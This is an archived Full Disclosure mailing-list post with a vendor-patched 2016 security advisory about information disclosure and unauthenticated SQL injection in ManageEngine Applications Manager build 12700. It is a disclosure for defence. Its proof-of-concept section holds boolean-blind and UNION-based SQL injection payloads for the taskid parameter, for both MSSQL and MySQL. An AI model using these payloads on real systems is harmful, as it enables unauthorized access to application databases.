lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Message-Id: <D36B40EF-5DC1-41E1-AFAD-85CE7F5D20F2@elsherei.com>
Date: Fri, 6 May 2016 13:48:32 +0100
From: Saif El-Sherei <saif@...herei.com>
To: Saif El-Sherei <saif@...sepost.com>
Cc: oss-security@...ts.openwall.org, fulldisclosure@...lists.org,
 dominic@...sepost.com, cve-assign@...re.org
Subject: Re: [FD] CVE Request for ManageEngine Applications Manager Build
	No: 12700 Information Disclosure and Un-Authenticated SQL injection.

Heya,

I was already informed that the product is mot covered by Mitre CVE the release is just for responsible disclosure not CVE request. 

Regards,
Saif 

Sent from my iPhone

> On 5 May 2016, at 12:04, Saif El-Sherei <saif@...sepost.com> wrote:
> 
> Heya, 
> 
> Wanted to request CVE for the following issues, that have been fixed by the vendor, fix details are at: https://www.manageengine.com/products/applications_manager/release-notes.html
> 
> [SPSA-2016-02/ManageEngine ApplicationsManager]------------------------------
> 
> SECURITY ADVISORY:   SPSA-2016-02/ManageEngine Applications Manager Build No: 12700
> 
> Affected Software:   ManageEngine Applications Manager Build No: 12700
> Vulnerability:       Information Disclosure and Un-Authenticated SQL
> injection.
> CVSSv3:              9.3
> Severity:            Critical
> Release Date:        2016-05-05
> 
> I. Background
> ~~~~~~~~~~~~~           
> 
> ManageEngine Applications Manager is an Application Performance Monitoring across physical, virtual and cloud environments.
> 
> 
> II. Description
> ~~~~~~~~~~~~~~~
> 
> For details about the fix please visit https://www.manageengine.com/products/applications_manager/release-notes.html
> 
> Information Disclosure:
> ~~~~~~~~~~~~~~~~~~~~~~~
> 
> Some scripts were accessible without authentication, which allowed public access to sensitive data such as licensing information and Monitored Server Details like name IP and maintenance schedule.
> 
> POC
> ~~~
> 
> License Information:
> https://ManageEngineHost/jsp/About.jsp?context=/CAMGlobalReports.do?method=disableReports 
> 
> List of Maintenance tasks:
> https://ManageEngineHost/downTimeScheduler.do?method=maintenanceTaskListView&tabtoLoad=downtimeSchedulersDiv
> 
> Details of Maintenance tasks with details about monitored server:
> https://ManageEngineHost/downTimeScheduler.do?method=viewMaintenanceTask&taskid=2&edit=true&readonly=false
> 
> SQL Injection:
> ~~~~~~~~~~~~~~
> 
> The downTimeScheduler.do script is vulnerable to a Boolean based blind, and Union based SQL injection, that allows complete unauthorized access to the back-end database, according to the level of privileges of the application database user.
> 
> Vulnerable URL:
> https://ManageEngineHost/downTimeScheduler.do?method=viewMaintenanceTask&taskid=1
> Vulnerable Parameter: GET parameter taskid
> 
> PoC:
> ~~~~
> 
> Boolean Based Blind SQL Injection PoC: 
> 
> https://ManageEngineHost/downTimeScheduler.do?method=viewMaintenanceTask&taskid=1
> and 1=1  (True)
> 
> https://ManageEngineHost/downTimeScheduler.do?method=viewMaintenanceTask&taskid=1
> and 1=2  (False)
> 
> The following will include the Database Name in the Schedule Details
> Description text box:
> 
> Union-Based SQL Injection PoC: Number of Columns 15, ORDER BY was
> usable.
> 
> MSSQL: During our testing, the payload needed to be URL Encoded.
> 
> https://ManageEngineHost/downTimeScheduler.do?method=viewMaintenanceTask&taskid=-1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CCHAR%28113%29%2BCHAR%28118%29%2BCHAR%28112%29%2BCHAR%28113%29%2BCHAR%28113%29%2BISNULL%28CAST%28%28SELECT%20DB_NAME%28%29%29%20AS%20NVARCHAR%284000%29%29%2CCHAR%2832%29%29%2BCHAR%28113%29%2BCHAR%2898%29%2BCHAR%28107%29%2BCHAR%28112%29%2BCHAR%28113%29%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--
> 
> MYSQL: During our testing, the payload did not need URL Encoding.
> 
> https://ManageEngineHost/downTimeScheduler.do?method=viewMaintenanceTask&taskid=-1%20UNION%20ALL%20SELECT%201,2,database(),4,5,6,7,8,9,10,11,12,13,14,15%20--
> 
> 
> III. Impact
> ~~~~~~~~~~~
> 
> Information Disclosure Impact:
> 
> An attacker might make use of the intelligence gathered through information leakages such as these for further attacks against the application, and its underlying infrastructure
> 
> Un-Authenticated SQL Injection Impact:
> 
> Access to sensitive information, stored in the application Database server, depending on the privileges of the application's database user. 
> 
> 
> IV. Remediation
> ~~~~~~~~~~~~~~~
> 
> Apply Vendor supplied patch build #12710, details are available at
> https://www.manageengine.com/products/applications_manager/release-notes.html
> 
> V. Disclosure
> ~~~~~~~~~~~~~
> 
> Reported By: Saif El-Sherei, @saif_sherei, saif@...sepost.com
> 
> Discovery Date:         2016-02-29
> Vendor Informed:        2016-03-04
> Advisory Release Date:  2016-05-05
> Patch Release Date:     2016-04-28
> Advisory Updated:        2016-05-05
> 
> 
> ---------------------------------[SPSA-2016-02/ManageEngine ApplicationsManager]---
> 
> 
> Regards,
> 
> Saif
> 
> _______________________________________________
> Sent through the Full Disclosure mailing list
> https://nmap.org/mailman/listinfo/fulldisclosure
> Web Archives & RSS: http://seclists.org/fulldisclosure/

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ